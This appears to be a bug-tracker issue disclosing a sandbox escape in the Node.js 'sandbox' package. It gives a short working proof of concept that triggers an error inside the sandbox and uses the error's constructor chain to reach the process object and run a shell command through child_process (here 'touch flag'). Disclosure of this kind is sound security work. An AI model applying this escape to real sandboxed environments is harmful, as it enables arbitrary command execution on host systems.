Open seongil-wi opened 1 year ago
```js
var Sandbox = require("sandbox")
var code = `
try{
    __defineGetter__("x", );
}
catch(ret){
    ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
`
s = new Sandbox()
s.run(code)
```
Sandbox can be escaped by calling the `__defineGetter__` or `__defineSetter__` function. Also, we can execute arbitrary shell code using the process module.